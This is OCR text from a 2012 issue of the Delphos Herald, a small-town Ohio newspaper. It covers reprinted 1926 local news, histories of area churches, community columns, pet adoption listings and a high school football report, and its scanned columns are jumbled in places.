notified Sheriff Johnson, of Van Wert County. By order of Mr. Wagoner, the men were removed to the Van Wert County Hospital in the Harter and Brenneman ambulance. Mitchel is about 22 years old and a married man. Delphos Herald, Oct. 19, 1926 ---------Attempted robbery figured out The mystery of the attempted robbery of the Mueller-Chevrolet garage and of the
Roaring 20’s news Those Were The Days
BOB HOLDGREVE
STATE/LOCAL
Window to the Past
change of heart by the intruders which caused them to depart without the loot has been partially explained. Upon reading the account of the attempt in the Herald Wednesday night, Merchants’ Policeman Art Kohn was reminded of the strange actions of some people in an automobile on West Second Street Tuesday night and the police are of the opinion that these were the guilty parties. While making the rounds on the night in question, Mr. Kohn noticed a machine with headlights burning, parked on the north side of Second Street, across from the MuellerChevrolet garage. As it was about 2 a.m. he considered this deserving of attention and crossed the street and walked behind the car. He then noticed that the near license plate was missing. He immediately called the night police from the city building. The people in the car noticed that they had attracted attention and, honking their horn sped away. The police started after the machine, which, in the meantime, had made several circuits in the vicinity of West Second and headed west on the Lincoln Highway. The police followed, but their machine was unable to match the speed of the fugitive car and they made their escape. Delphos Herald Sept. 30, 1926 ---------Greatly pleased with appearance of Delphos Administration for the city of Delphos and surprises at the great changes which have been wrought here were expressed by J.W. Berryman, St. Marys, upon occasion of a visit at the O.J. Brenneman home, 501 North Canal Street. Mr. Berryman was accompanied here by his wife who had never visited Delphos. Mr. Barryman had not been in this city for fiftysix years past. Needless to say, he found many changes. He was greatly pleased with the appearance of the city, commenting upon the prosperous appearance of the business district and admiring the beautiful residence streets. He also spoke of the excellent walks which have replaced the old board walks which he remembered, and found a great improvement in the streets. Delphos Herald Sept. 14, 1926 ---------G. & L. Boot Shop changes ownership A change in ownership of the G. & L. Boot Shop is announced, and it will be known as the Z. & L. Boot Shop. Jos. Zimmerle, Toledo, and Alex. Lindemann have purchased the store from N. C. Miller. The new owners intend to move the store into the Zimmerle building and will occupy the room which is now used by the Moorman & Myers grocery. This room will be completely remodeled, a new front will be installed, also a new steel ceiling and new shelving. When completed, it will be a modern shoe store in every respect. Mr. Zimmerle was born and reared in Delphos and has many friends here. For the past 15 years he has resided in Toledo. Mr. Lindeman has been in the shoe business in Delphos for many years past. Ten years ago, he and Mrs. Lena Goebel started this store in its present location. Six years ago, it was sold to Mr. Miller, who conducted it until now. Mr. Lindeman worked in the store also. Mr. Zimmerle plans to move his family to Delphos in the near future. Mr. Miller states he has not made any plans for the future. The Delphos Herald, Sept. 14, 1926 ---------New library hours A new schedule of hours for the Delphos Public Library was placed in effect Monday. This new schedule is expected to prove a convenience to the general public and especially to the pupils in the local schools. One of the most important changes is to have the library open during the noon hour. This will give the pupils, especially those residing outside the city, a place to spend the noon hour in a profitable manner. Delphos Herald, Sept. 14, 1926 ---------Itinerant uses “canned” heat An itinerant named James Marsell of Missouri was arrested on North Main Street Thursday night. He is said to have been imbibing on “canned heat”, when he was arrested. He said he ran out of liquor and took the canned heat. When released, he was given 10 minutes to leave city. Delphos Herald, Sept. 24, 1926
Pastor Dan Eaton
‘It began with a dream in 1932’
Pastor Dan and Janie Eaton There is a lot of room for Franklin D. Roosevelt as improvement in America part of his New Deal. today, but 80 years ago Government and comthings were really tough. panies implemented wage In 1932, the economy was cuts up to 30 percent for in bad shape and unem- those lucky enough to be ployment was at 24.5 employed and cut working percent. Thirteen million hours for those employed Americans were unem- hoping to provide more ployed as there were few jobs for those who were jobs and tens of thousands unemployed. Due to malof ordinary Americans nutrition and poor health people loaded up their tuberculosis became widebelongings and lived in spread throughout the US. cars going from place to Perhaps because of the place looking for work. bad things happening in People lost their homes our country, a Delphos resand shanty towns appeared ident, Tillie Hershey, startaround the country built ed having prayer meetings by homeless people using in her home. Mrs. Hershey wood from crates, card- began to have a dream of board, scraps of metal, or a Pentecostal church being whatever materials were in Delphos. A tent revivavailable to them. al was held in the winter In an effort to help more of 1932. The revival was people from losing their so successful in reachhomes, the Comptroller of ing people that a building the Currency announced a was purchased at 1104 N. temporary halt by banks of Washington St. and the Full foreclosures. The Revenue Gospel Tabernacle church Act of 1932 raised United was born. Five years later, States tax rates across the the church became affiliboard, with the rate on top ated with the Assemblies incomes rising from 25 of God. percent to 63 percent! In 1950, under the Things were so bad that leadership of Pastor C. L. 43,000 marchers, includ- Gruver, the church reloing 17,000 World War I cated and built a new sancvets who were supposed tuary at 808 Metbliss Ave. to receive army bonuses, During 1954 to 1956, Rev. marched to Washington, Anthony DePolo served as D.C., and set up camp- the pastor. Under his leadgrounds demanding early ership the completion of payments of cash bonuses the exterior of the church to help survive the Great was accomplished and the Depression. Troops under name of the church was the orders of General changed to “First Assembly Douglas MacArthur of God.” advanced with bayonets In 1961, Rev. Warren and sabers drawn under a Campbell assumed the shower of bricks and rocks, pastorate and the parsonbut no shots were fired. In less than four hours, the HANKS FOR troops cleared the Bonus EADING Army’s campground using T tear gas. ELPHOS The Emergency Relief T and Construction Act ELPHOSTelling The Tri-County’s Story Since 1869 ERALD enacted July 21, 1932, 405 N. Main St., Delphos, OH 45833 was the United States first Got a news tip? major-relief legislation to Want to promote fund public works hopan event or business? Nancy Spencer, editor ing to put millions back 419-695-0015 ext. 134 to work, enabled under nspencer@delphosherald.com Herbert Hoover and later Don Hemple, advertising manager 419-695-0015 ext. 138 adopted and expanded by dhemple@delphosherald.com
age was built next to the church. Rev. Daryl Sharp became the pastor in1971 and led the congregation in the building of the multipurpose center now known as The ROC (Righteous Outreach Center). In 1985, Rev. Terry Collier assumed the pastorate and on March 8, 1987, groundbreaking took place for the current sanctuary. The new sanctuary was dedicated on Nov. 15, 1987. What started with a dream in the heart of a woman has resulted in 80 years of ministry to Delphos, the surrounding communities, and the world. During those eight decades, God has called people from our church to become pastors, evangelists, and missionaries. Our wonderful church family has given and continues to give and to pray which has enabled other churches to be planted in America and around the world..” My wife, Janie, and I are so pleased to be the pastors of Delphos First Assembly of God. This year, we are celebrating our church’s 80 great years of ministry. However, we believe that the church’s best years are not in the past, but are yet to come!
FREE TAX SCHOOL
Register now! Courses start HERALD Sept. 13
Call
Earn extra income after taking course. Flexible schedules, convenient locations.
T
D
HE
D
R
HE
Telling The Tri-County’s Story Since 1869
H
Telling The Tri-County’s Story Since 1869
Liberty Tax Service
Small fee for books.
419-229-1040
50th Annual
Ottoville Park Carnival
SATURDAY, SEPTEMBER 1st
8:00 p.m. to 11:00 p.m.
“Always Labor Day Weekend” Friday, August 31st, Saturday, September 1st & Sunday, September. 2nd
FREE LIVE ENTERTAINMENT
FRIDAY, AUGUST 31st
9:00 p.m. to midnight
Ohio’s Finest Live Rock Party Band
Brother Believe Me 50’s & 60’s Dance Tractor Square Dancing Polly Mae 9:00 p.m. to midnight
4:00 p.m. to 7:00 p.m.
SUNDAY, SEPTEMBER 2nd!
4 — The Herald
Saturday, August 25, 2012
Viewpoint
That
The Lutheran Church Life in small town America often revolved around church and school. This was true in the 1800s and is still true today. The German Lutherans were among the first to put their feet down in Jennings Township. The Raabe and Discher families arrived in 1833. They were accompanied by John Hedrick. This group from Hessia, Germany formed the nucleus of the Lutheran Church in Fort Jennings. A group of Catholic settlers arrived in 1834. These early Christians had an unusual arrangement. They built a log cabin in 1840, which they shared for worship services. The Catholics had Mass in the cabin on Sunday mornings and the Lutherans conducted services in the same building in the afternoon. During the week the log cabin served as the school for both groups. This log structure was located on the southeast side of the road next to the VonderEmbse property. This financial and administrative ecumenism was a result of their experiences in Northern Germany, where the religion of the people changed from Catholic to Protestant, according to the religion of the ruler of that area.
“History is the sum total of the things that could have been avoided.” —
Konrad Adenauer, German statesman (1876-1967)
This and
by HELEN KAVERMAN
The St. John’s Evangelical Lutheran Church had the distinction of being one of the first churches established in Putnam County. The parish can trace it’s official origins back to 1840, when the two congregations shared the same building. Unlike most churches of that period the parish began with a full time resident pastor. Rev. Keniston made his home in the Odenweller House. Rev. Keniston served the parish well until he died of cholera in 1855, during the epidemic. The Raabe, Discher and Hedrick families formed the nucleus but others instrumental in forming the Lutheran Parish were Jacob Freund, Christoph Bleuthman, Johann H. Allemeier, Johann W. Allemeier, Christoph Ritzman, Frederick W. Allemeier, Henrietta Allemeier, and Adolph Allemeier. Itinerant pastors served the congregation following the death of Rev. Keniston. One of these traveling preachers, the Rev. Furham, drowned in the Miami-Erie Canal at Lock 13 while making his way from one parish location to another. The congregation outgrew the log cabin and better building materials came available,
IT WAS NEWS THEN
One Year Ago • After the parade dust settled and the last corn hole bag thrown, the Marbletown Festival Committee found this year’s event raised more than $3,000. The festival has been the financial thrust behind improvements at Garfield Park off South Clay Street. New sidewalks, a shelterhouse and grill and a Garfield School marker have been added since the festival’s inception in 2006. 25 Years Ago — 1987 • Barbara Schmidt, business manager of The Delphos Herald, has retired after 25 years with the company, Thom Dunlavy, publisher, announced. Schmidt plans to do some volunteer work and some traveling, along with her hobbies of bowling and reading. • Girl Scout Troop 83 of Fort Jennings demonstrated lummi sticks at the Ohio State Fair in the Girl Scout booth. Lummi sticks are an American Indian rhythm game. Girl Scouts at the fair were Missy Utrup, Lisa Swick, D. D. Warnecke, Laura Wittler, Kate Schroeder, Melissa Maenle and Crystal Birkemeier. • St. John’s volleyball team returns six letter-winners and is preparing for a successful season. The letter-winners include setter Laura Shaw, hitters Cyndi Kortokrax, Bev Fisher, Elaine Wrasman, Vicki Kunz and Tina Kill. Other squad members include senior Amy Gerdeman, juniors Anne Hohman, Lisa Sadler, and Betsy Wittler and sophomores Nikki Wellman and Jill Schimmoeller. 50 Years Ago — 1962 • The newly crowned Miss United States Twirling champion, Jean Ann Roode, 19, of New Knoxville, will present two exhibitions at the annual Volunteer Firemen’s Homecoming and Picnic at Waterworks Park Sunday. She will appear at 4 p.m. and will do her fire baton routine at 8 p.m. She has made a number of appearances with the Delphos Eagles Band. She was with the band in Dayton when it won first place in the state contest, and she appeared with it at the national convention in Pittsburgh, Pa. • Dr. Burl G. Morris has been re-elected chairman of the board of the Ohio Federation of Chiropractic Organizations. This will be Dr. Morris’ second term as head of the state-wide group which was formed to coordinate and combine the activities of all Ohio Chiropractic organizations. As first chairman of the OFCO, Morris participated in the writing of the by-laws and constitution of the new group. • Sunday will be the red letter day for the golfing contingent of the Delphos Country Club as the tourney finals will be in full swing. Final play in the men’s championship flight will get under at 1 p.m. with John Yerick matched against Bud Miller. In the Men’s Flight A, Romus Brandehoff and Dr. Earl Morris will vie for the championship honors. Tom Honigford and Jerome Altenburger will play to decide Flight B championship. 75 Years Ago — 1937 • The first day and night of the Allen County Fair proved to be a big success according to all reports. A large number of fair visitors were on the streets during the afternoon and evening. The dance pavilion enjoyed the best opening night in the history of the Delphos Fair. Carl Dienstberger and his orchestra played for the dancing. • The local Auxiliary of the American Legion, yet in its infancy, has received a special merit citation for the fine work accomplished since its inception. Announcement to that effect was made at a regular meeting conducted in the Legion rooms. Mrs. Dell Cochensparger and Mrs. Frank Mundy, delegates to the state convention held recently at Columbus, presented their reports. • Rev. Julian A. Garrity, a native of Delphos, has been transferred from Chicago to Cincinnati, where he has been made pastor of St. Xavier’s Church, one of the oldest parishes in the city and located in the downtown district. Father Garrity is a cousin of Lilly and Henrietta Lang and Charles Lang, West Second Street, and of Otto
making a modest frame church possible. The new church was built on Lot 38, across from the hardware store. In 1940, the building was still standing at the home of Mrs. A. H. Raabe. According to printed St. John’s histories of 1940 and 1965: Rev. Alstetter and Rev. Fliener served both the Fort Jennings and Delphos congregations for a time. The influx of settlers had brought the Lutheran and Reformed into the community and no distinction had been made between these two forms of service. With the pastorate of Rev. Huebner, 1871 – 1876, these differences were emphasized and the Reformed withdrew to start their own congregation in Delphos. However many of the Reformed remained with the FortJennings Church, but it was necessary to combine the Fort Jennings and Delphos Lutheran Churches into a parish. Rev. Irick and Rev. Reitz served these two congregations until 1880. In the earlier years of the Lutheran Church, no records were kept. Therefore it is impossible to find the first persons baptized or buried when the church was first formed in 1840. The children were normally baptized very soon after birth. So it is highly possible that before the first structure was built, baptisms and services took place in the homes. In 1882 there were three recorded baptisms. They were the following: Johann Frederick Zenner, Anna Katharina Rudka and Maria Ellen Cumming. The first recorded deaths in the parish were in November 1883. There were three: Johanne Hettrich Jacob, Johann Friedrich Jenner and David Otto Jenner. Rev. Born began his pastorate in 1880 and both congregations had grown to a point where they needed the full service of a pastor. This was accomplished with the calling of Rev. Schnepel, who was the first full-time pastor in Fort Jennings since Rev. Keniston. This marked a turning point in the congregation as it began to expand. A parsonage was erected at a cost of 350.00. Mrs. Schnepel was well known for planting several fruit trees on the property. From 1902 until 1911 Rev. Bailey served the growing congregation during what was regarded as the golden era of the church. A new church was planned and built. The cornerstone was laid in 1903 and in 1904 the church was dedicated to the services of the Lord. The good people of the parish made many sacrifices of time, labor, talent and wisdom. This resulted in the church being debt free on the date of dedication. The church was adorned with beautiful memorial windows. This was followed by periods of trouble and crises. The following is a list of pastors who served the parish through the years that followed:
1912-1914 — Rev. Grim 1914 – 1917 — Rev. Florstedt 1917 – 1919 — Rev. Schulz 1920 - 1924 — Rev. Boerger 1924 – 1927 - Rev. Mollenkoph 1927 - 1931 — Rev. Shawkey 1932 – 1941 — Rev. Stroh 1941 – 1960 — Rev. Spithaler 1960 – 1962 — Rev. Florstedt & Rev. Heuer 1962 – 1964 — Rev. Oestreich
Churches in Fort Jennings
and banquets the Invocation was given by Father Miller, with Rev. Spithaler giving the Benediction. Rev. Cox served the parish for many years. He mentioned how the Raabe family had very strong ties to the church. In 1978 the church received extensive remodeling. The Raabe families contributed a substantial amount of money toward that project even though none of them live in the community anymore. The Chapel was named the Raabe Family Memorial Chapel. The church was restored inside and out with many businesses and individuals contributing money for the project. New carpets were installed, pews were refinished, the fellowship hall downstairs was remodeled with a modern kitchen, the church was re-wired, new plumbing installed and the building was sandblasted. James Shroyer, another man of the parish was pointed out by Rev. Cox: “At age 92 (in 1985), he is our elder statesman.” He told that Jim Shroyer was very active in Church and Civic obligations. Cox remarked how the Lutheran and Catholic congregations had a very good relationship in town. When the Raabe families lived in Fort Jennings the church was very important to them. When Howard and George were 11 and 13 years old, they acted as church janitors….getting up at 4 a.m. on Sunday mornings to fire up the furnace. The church took a few hours to heat up. Music was a very important part of the services. The organist who served the longest was Ellen Cummings who played until she was in her 80’s. Others who followed were Dorothy Huber, Ann Dienstberger, Cathy Hammons, Ann Klausing, Carl Wieging and Janice Freund. Special music was sung for Christmas, Lent and Easter. One musician told about a Service of Darkness that had a Lenten hymn for Good Friday that had 17 verses. One verse would be sung, one candle was then extinguished, and a short sermonette was given between each of the 27 verses. By the end of the extremely long service, which ended up totally dark, at least one person was always caught sleeping. Each year in September, a Homecoming was planned. It was a time when previous members returned to their home church in Fort Jennings to renew old friendships and have a fellowship day together. It was always a full church. A big carry-in dinner was always planned with special music. Clo Chandler reflected on the time around 1959. Several barbershop quartets came to sing. Kenny Raabe sang in one of them called, “The Applechords. It was great singing. The “American Lutheran Church Women”, previously known as the “Ladies Aid” and “The American Federation of Lutheran Church Women” was a vital part of the congregation. In the 1960’s this organization became the A.L.C.W. Those groups were avid fund-raisers as well as prayer warriors. This group held monthly meetings and regular bible study. Another breakthrough in Ecumenism came in the early 1970’s. It was not part of the women’s official organization, but several women felt a strong need to reach out and find a common ground to unlock and share their faith. At this time, Sister Paulette and Sister Jackie, who were in the St. Joseph’s Parish. Clo Chandler and Janice Freund, along with the Sisters, started an interfaith prayer group. They met in homes and did many activities together. It truly was being one in the Spirit. Rev. John Cox was the last pastor to serve the Fort Jennings Parish. He went on to serve at Christ Lutheran in Continental. The last person baptized in the parish, was Timothy Schlatman in July 1982. The last funeral officiated was Rachael Wannemacher. Some families associated with the Lutheran Church over the years were: Freund, Friend, Wreede, Hammonds, Schramm, Geckle, Chandler, Shroyer, Bilimek, Blockberger, Sarka, Peters, Allemeier, Leatherman, Ladd, Cuming, Persinger, Stirm, Dowler, Kortier, Raabe, Arn, Plasic, Kimmerle, Ratliff, Davis, Bluethmer and Adams. Paul Allemeier was the fifth generation of Allemeiers to attend the church. His ancestors were among the founders.
Student Pastors served for a short time period and Rev. Hare served in 1974. Rev. Cox was the pastor when St. John’s closed its doors. Rev. Mettermaier of St. Peter’s in Delphos assisted the Fort Jennings congregation during many of those years, especially between pastorates. In 1933 the church was redecorated through the kindness of Cornelius Kortier. The parish celebrated 125 years in 1965. At that time the parish had a baptized membership of 126 and 92 confirmed. The church basement had been enlarged and renovated in recent years at a cost of $10,000; this included a new furnace in the parsonage and a renovation of the parsonage. A water softener was also installed in the parsonage. The church interior was washed and the roof repaired in 1965. Many people of the town have fond memories or Rev. Spithaler, who was pastor from 1941-60. Everyone knew him…after all he was also a school bus driver. Ecumenism continued in Fort Jennings. School and public events included both Catholic and Lutheran pastors. At high school graduation exercises
St. John’s was dissolved 31 January 1988 because “the congregation simply became too small, they were no longer able to support a ministry there”, said the Rev. Michael Scherer, of the Northwestern Ohio Synod. Some of the parishioners have become members of the Lutheran Church in Continental, while others joined St. Peter’s in Delphos. The church furniture and pipe organ were donated to a Lutheran Mission Church in Lake Zurich, Illinois. One of the former members of the church in Fort Jennings had moved to Lake Zurich, and became a member of this little Lutheran mission. She ended up using the same pews she had used as a child. The 19 stained glass windows of the church were carefully removed in November and December of 1989 and donated to a newly constructed mission church, Christ Lutheran Church of Elk River, Minnesota. A crew of 5 removed the windows, along with the frames. Jack Holmes of Elk River said the cost of a new round 6 Fortdiameter stained glass window would be between five and six thousand. The name plates went along with the windows to Elk River. They bore the names of Stroh, Raabe, Kimmerle, Arn, Yenner, Davis, Friend, Freund and Brenner. The church bell will also be used in the steeple of the Elk River Church. The church building was demolished in March of 1990 by Gasser Contracting. Phil Oney gathered up some of the bricks for his patio, as did other residents of Fort Jennings. Mrs. Eda Kohls lives in a nice home on the former church lot at the corner of Main and Fourth Streets. The church parsonage next door was purchased by Tony Recker. The Recker family has extensively enlarged and remodeled the house. During the last formal service on 3 January 1988, the members took communion. They then took their communion supplies to Christ Lutheran Church in Continental as a symbolic gesture of the two churches joined together. It was sad to say “Good-Bye”. Many former parishioners are resting in the old Raabe Cemetery on Road 20-P, east of Fort Jennings and in the Calvary Cemetery on Route l90 near Fort Jennings. Sixty four pages of birth, death and marriage records were obtained from archives in Columbus through the efforts of John Freund of Fort Jennings and John Freund of Van Wert. These records can be found in the Bicentennial History of Fort Jennings, 1812 – 2012. A second printing of this book has been, with copies available at the Commercial Tax Office in Fort Jennings. St. Joseph’s Catholic Church The first group of Catholic pioneers arrived at Fort Jennings in July of 1834. The Lutherans had arrived in 1833. According to the Boehmer letters this group included H. J. Boehmer, Ferdinand VonderEmbse, B. H. Biester and his daughter, O. Deters, Dina Wilberding and J. H. Wellman. Wellman was from Langfoerden, Germany. Boehmer and the others were from Steinfeld, Germany. According to the 1998 Blue Book (History of St. Joseph’s), others in the “group of 10” could have been Agnes VonDerembse, Henry Frederick Wellman and Mary Wellman. Soon there-after came Ferdinand Gerking (King), Christopher Helmkamp, Casper Gerker, Calvelage and
Lutheran Church
VonLehmden. The Rekart family arrived in Putnam County after spending 10 years in Pennsylvania. Imogene Elwer wrote in the Blue Book that most of the early settlers first purchased land across the river from the fort. She discovered this information in early tax records, found in the court house attic. Since there was no employment to be found in this area, Boehmer returned to Minster, where he taught school for a couple years. He had been a teacher in Germany. While in Minster in 1837, he married Mary Wellman, daughter of J. H. Wellman. They returned to Fort Jennings in 1838. Boehmer taught school in Fort Jennings and traded tobacco, whisky and other supplies for furs and skins with Indians and settlers from his cabin across the river. In the early days of FortJ ennings the spiritual needs of the residents were provided by the Rev. William Horstmann, of Glandorf on the Blanchard River. He and John Kahle arrived in Putnam County in 1830. They came from Glandorf, Germany. The Professor, as he was known, possessed a great missionary zeal. In addition to his home parish, he traveled to Wapakoneta and Minster to attend to the spiritual wants of the Catholics there. Noticing the number of Catholics at Fort Jennings, he added that community to his missions and in 1834 said Mass for the first time in the home of one of the pioneers. Father Horstmann was also well versed in medicine, science and woodcraFort For four years he made the 18 mile trip to Fort Jennings about once a month. As time passed Father George Boehne was sent to Glandorf to assist Father Horstman. The Rev. Tunker, a pastor in Dayton came to FortJ ennings in 1838. He stayed a year or two. According to several local histories the Rev. Henry Herzog arrived in 1840. However the 1998 Blue Book states that “The Rev. Henry Herzog came to Fort Jennings in September of 1846 but remained only a year or so.” (More about him later.) Most historians record that Father Horstmann again served the Fort Jennings Catholics from 1839 to 1843, when he passed on to his great reward. The Blue Book lists Rev. George Boehne as serving the Fort Jennings people from 1841 – 1846; then again from 1847-1848 (traveling from Glandorf). During that time Rev. Herzog arrived in town, probably in 1846. He was not appointed by the Bishop, but remained in town for a year or so. Rev. Herzog stirred up trouble wherever he went. In Minster he created such a problem that Bishop Purcell of Cincinnati assigned another priest to that parish to restore order. Herzog left Ohio for a short time. After his arrival in Fort Jennings in 1846 he functioned as a priest, but without assignment. The records of the Rekart family indicate that Rev. Herzog performed the marriage of Sigmund Rekart and Mary Discher on 4 February 1847. In 1848, two priests from the Minster area wrote to Bishop Rappe of Cleveland, (the Cleveland Diocese was formed in 1847) wondering “what can be done with Henry Herzog”, who was reported living with the Boehmer family in Fort Jennings at that time. The Bishop of Cleveland wrote to the Bishop of Cincinnati, regarding a letter he had
(See Fort Jennings page 8)
Saturday, August 25, 2012
The Herald – 5
COMMUNITY
LANDMARK
From the Thrift Shop
The Humane Society of Allen County has many pets waiting for adoption. Each comes with a spay or neuter, first shots and a heartworm test. Call 419-991-1775. Elida High School
PET CORNER
CALENDAR OF
EVENTS
TODAY 9 a.m.-noon — Interfaith Thrift Store, North Main Street.. 5 p.m. — Delphos Coon and Sportsman’s Club hosts a chicken fry. 7 p.m. — Bingo at St. John’s Little Theatre. SUNDAY 1-3 p.m. — The Delphos Canal Commission Museum, 241 N. Main St., is open. 1-4 p.m. — Putnam County Museum is open, 202 E. Main St. Kalida. 1:30 p.m. — Amvets Post 698 Auxiliary meets at the Amvets post in Middle Point. Daphne has been nursed back to health and loves people, is good with children, is playful and likes other dogs. She graduated her basic obedience class and won the class’s agility competition. Sadie is a grey tiger cat who has had one eye removed - it has not slowed this playful gal down one little bit. She’s ready for a loving home - and toys! Lots of toys!
BY MARGIE ROSTORFER Thank you all for your prayers, thoughts, well wishes and support for Scott, his wife, Carrie, and the German and Rostorfer families since Scott’s accidental fall last Thursday evening at Michigan International Speedway. Who would ever guess that falling a mere 14 inches could threaten Scott’s life with such severe brain/head trauma. After being life-flighted to the Toledo Hospital, Scott underwent immediate surgery to alleviate the blood clots and rapid swelling of his brain. He has given us some scares these past several days and remains in a coma and on a machine to help him breathe but he is young and strong — two definite pluses the doctors say; but the biggest plus is God. Speaking of pluses, did you know that the Delphos Thrift Shop was named one of the top three thrift shops in the region? We’re actually ranked second and are extremely proud to be named in the “Best of the Region 2012.” They listed highlights of the store as “the boutique area where shoppers can find name brand jewelry, clothing, designer purses and antique items. With teenagers heading off to college, stop
Happy Birthday
Aug. 26 Gracie Gunter Kristi Gillespie Troy Calvelage Carter Mox Anthony Martz Andrew Martz Aug. 27 Kevin Sendelbach William Nomina April Patton Jessica Conley Keri Hetrick Camden Gable
by the shop for blankets and sheets and household items. Other highlights include the toys and books for sale.” The Board of Directors were excited about the ranking and the article that described the shop and the various departments and items that can be found here. With the end of the recent Lincoln Highway sales, be sure to check out all the great bargains and high quality items that have come in. All of the departments are benefitting from the donations that came in through the drop-off window and the selection is great. The board has finalized plans and set the date of Sept. 9 as the Open House for the new addition. The public is invited from 2-4 p.m. to view the new addition which houses the book department, toy department, the Food Pantry, and the Social Services Department. There will be no sales conducted during the Open House hours. At the last board meeting, it was discussed that a Facebook page might be in the works for the Thrift Shop. Stay tuned as the details get worked out. Shoppers have been heard to say that they’ve tried other shops but nothing beats the prices, the
selection, the cleanliness and the quality of the items at the Delphos Thrift Shop. There was a shopper in recently who was visiting from North Carolina and was just thrilled with what she had found. She comes several times a year and she said “everyone is always so nice, too.” Another customer was thrilled with all of the artificial flowers and greenery she found, saying that she “couldn’t wait to get home to decorate with it.” If you’d like to be a part of the volunteer team, call the shop at 419-692-2942 or stop by. Your help, which is desperately needed, will be greatly appreciated. Also needed are your shopping bags — all sizes — and bubble wrap for breakable items. Selection plus bargain prices plus friendly people plus cleanliness equals a pleasant shopping experience. Come enjoy all the pluses! Until the next time, that’s this month’s report.
The following animals are available through the Van wert Animal Protective League: Cats M, F, 1-15years, brown, black and white, gray tiger, yellow tiger, tabby, black, long- and short-haired, fixed F, 1 year, fixed, front dew clawed, black, long haired, named Lily M, F, 8 years, 4 years, white with yellow, black, fixed M, 5 years, fixed, gray, name Shadow F, 1 year, gray tiger Kittens M, F, 3 months, gray tiger, rusty, calico M, 1 months, dump off, black M, 6 months, orange and white, name Ziggy M, F, 3 months, black and white spos, black and white M, F, 6 weeks, black,
gray tiger
Dogs Yellow Lab, F, 1/12 years, shots, name Haley Black Lab, F, 5 years, shots, name Sally Yellow Lab, F, 6 years, name Samantha Puppies Blue Healer Collie Cocker Spaniel Lab F, 3 months, black, shots, medium size Jack Russell, M, F, black and white’re looking for becomes available. Donations or correspondence can be sent to PO Box 321, Van Wert, Ohio, 45891.
DELPHOS
THE
Nancy Spencer, editor 419-695-0015 ext. 134 nspencer@delphosherald.com
Thanks for reading
News About Y our Community 405 N. Main St., Delphos, OH 45833 419-695-0015 Got a news tip? W ant to promote an event or business?
Telling The Tri-County’s Story Since 1869
HERALD
Don Hemple, advertising manager 419-695-0015 ext. 138 dhemple@delphosherald.com
Downtown Delphos
Better health, one step at a time.
St. Rita’s Medical Center and Lima Mall are helping you stay in shape all year long with the “Healthy Steppers” mall walking club. This self-paced program lets you go at your own rate and gives you access to a safe, climate-controlled environment where you can burn calories, elevate your heartrate and make new friends along the way. To get started, sign up for free at Guest Services in Lima Mall. Just for joining the program, you’ll get a welcome packet that includes a t-shirt, car magnet and other fun stuff guaranteed to put some pep in your step! Plus, you’ll earn prizes for keeping track of your miles and reaching the designated milestones.
Step on over to Lima Mall and sign up today., August 25, 2012
Strong 2nd half spurs ‘Cats in opener
By JIM METCALFE jmetcalfe@delphosherald. com WAYNESFIELD — Sometimes, halftime adjustments in the game of football are less about Xs and Os and more about taking a deep breath. That is what Jefferson head coach Bub Lindeman and his coaching staff did in Friday night’s 2012 season-opener at Waynesfield-Goshen High School; slowed down their troops. Trailing 14-13 after 24 minutes on a beautiful summer evening, the Red and White dominated the second half in all three phases, seizing a 38-17 victory. “That’s really all we did; got them settled down. We made mistakes we hadn’t made during our two scrimmages, so you feared they’d rear their ugly head at some time,” Lindeman explained. “Fortunately, we have great senior leadership and the kids responded. They played with great effort and became more aggressive, especially defensively. For example, we read their option the first half but the second half, we played downhill against it and did much better.” The Wildcat defense, which had given up 208 yards of offense the first half, held the Tigers to 75 in the second. It wasn’t all peaches and cream, though; the visitors fumbled on their first play from scrimmage the second half, with Waynesfield’s Cole Sackinger recovering at the Jefferson 42. However, senior safety Drew Kortokrax tipped a pass over the middle from senior quarterback Garret Miller (7-of-18 passing, 78 yards, 3 picks) to senior teammate Chris Truesdale, setting the Wildcats up at their 34. They did not take advantage of that but they did after forcing a fumble and having Zach Kimmett pouncing on it at the Tiger 38 on the next WG drive. Senior bull Quentin Wessell (13 carries, 84 yards) rumbled for 23 and then went up the gut from the 15, powered through arm tackles and found paydirt at 8:22. After junior holder Ross Thompson tried to run from the 2-pointer — from the spread extra point — and after discussion by the referees, he was ruled to not get in, leaving the score 19-14, Wildcats. The Wildcat defense forced a punt on the next possession. Kortokrax gathered it in on the leftside numbers at his 20. Originally juggling the pigskin but not drop-
SPORTS
Weekly Athletic Schedule
FOR WEEK OF AUG. 27-SEPT. 1 MONDAY Boys Soccer Ottawa-Glandorf at Fort Jennings, 5 p.m. Kalida at Shawnee, 7 p.m. Girls Soccer Jefferson at Miller City, 5 p.m. Boys Golf Jefferson and Columbus Grove at Spencerville (NWC), 4 p.m. Leipsic at Ottoville (PCL), 4 p.m. Crestview and Ada at Paulding (NWC), 4 p.m. Ayersville at Fort Jennings, 4:30 p.m. St. Marys Memorial at Van Wert (WBL), 4:30 p.m. Celina at Elida (WBL), 5 p.m. Volleyball Van Wert at St. John’s, 5:30 p.m. Jefferson at WaynesfieldGoshen, 6 p.m. Ottoville at Parkway, 6 p.m. Continental at Lincolnview, 6 p.m. Girls Tennis Elida at Celina (WBL), 4:30 p.m. Van Wert at St. Marys Memorial (WBL), 4:30 p.m. TUESDAY Boys Soccer Spencerville at Botkins, 5 p.m. Van Wert at Lima Central Catholic, 7:30 p.m. Girls Soccer Lincolnview at Crestview (NWC), 5 p.m. Elida at Wapakoneta (WBL), 7 p.m. Van Wert at Shawnee (WBL), 7 p.m. Boys Golf Jefferson and Lima Central Catholic at Columbus Grove quad (NWC), 4 p.m. Kalida at Van Buren, 4:30 p.m. Girls Golf Parkway, Ayersville and Hicksville at Lincolnview, 4:30 p.m. Volleyball Crestview at Coldwater, 5:30 p.m. St. John’s at Spencerville, 6 p.m. Jefferson at Perry, 6 p.m. Lincolnview at Ottoville, 6 p.m. Hardin Northern at Elida, 6 p.m. Kalida at Van Wert, 6 p.m. Columbus Grove at Leipsic (PCL), 6 p.m. Co-ed Cross Country St. John’s, Ottoville, Lincolnview and Van Wert at Wayne Trace Invitational, 4:30 p.m. Girls Tennis Van Wert at Bryan, 4:30 p.m. WEDNESDAY Girls Soccer Fort Jennings at Miller City (PCL), 5 p.m. Kalida at Lima Central Catholic, 5:30 p.m. Boys Golf Jefferson and Lincolnview at Paulding (NWC), 4 p.m. Bath at Ottoville, 4 p.m. St. John’s at Versailles (MAC), 4:30 p.m. Spencerville, Crestview and Ada at Bluffton (NWC), 4:30 p.m.
